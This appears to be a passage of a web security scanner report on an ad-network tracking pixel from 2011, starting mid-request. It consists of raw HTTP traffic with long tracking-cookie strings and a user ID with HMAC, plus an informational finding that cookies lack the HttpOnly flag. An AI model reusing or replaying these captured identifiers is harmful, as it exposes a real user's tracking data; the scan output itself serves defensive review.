r5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 15:11:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0267.2rm.ac4
Set-Cookie: ih="b!!!!:!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; path=/; expires=Fri, 01-Feb-2013 15:11:28 GMT
Set-Cookie: bh="b!!!#p!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; path=/; expires=Fri, 01-Feb-2013 15:11:28 GMT
Set-Cookie: vuday1=5_x-c!>[UWVQm*h; path=/; expires=Thu, 03-Feb-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; path=/; expires=Fri, 01-Feb-2013 15:11:28 GMT
Set-Cookie: lifb=%y_Qs7i<Qa>BiQOJap]Thmj[); path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT
Location: http://ad.doubleclick.net/adj/N4233.RSI/B4932906.7;sz=300x250;pc=[TPAS_ID];click0=http://ad.thewheelof.com/clk?2,13%3B653249d08c366ff1%3B12de6eda05f,0%3B%3B%3B1017169916,NwQAAD4rFgD4vmoAAAAAACJcHgAAAAAAAgAAAAIAAAAAAP8AAAAECkpVJAAAAAAAl5IEAAAAAABSBigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAGZ.t5i0BAAAAAAAAAGI1OTgxOTRhLTJlZGUtMTFlMC05YmRiLTAwMzA0OGQ2ZDg5MABwAAAAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,;ord=1296659488?
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:11:28 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

12.221. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; path=/; expires=Thu, 31-Jan-2013 15:24:16 GMT
lifb=%y_Qs7i<Qa5p0/:; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=898198&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/cacheable/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; bh="b!!!#s!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"; 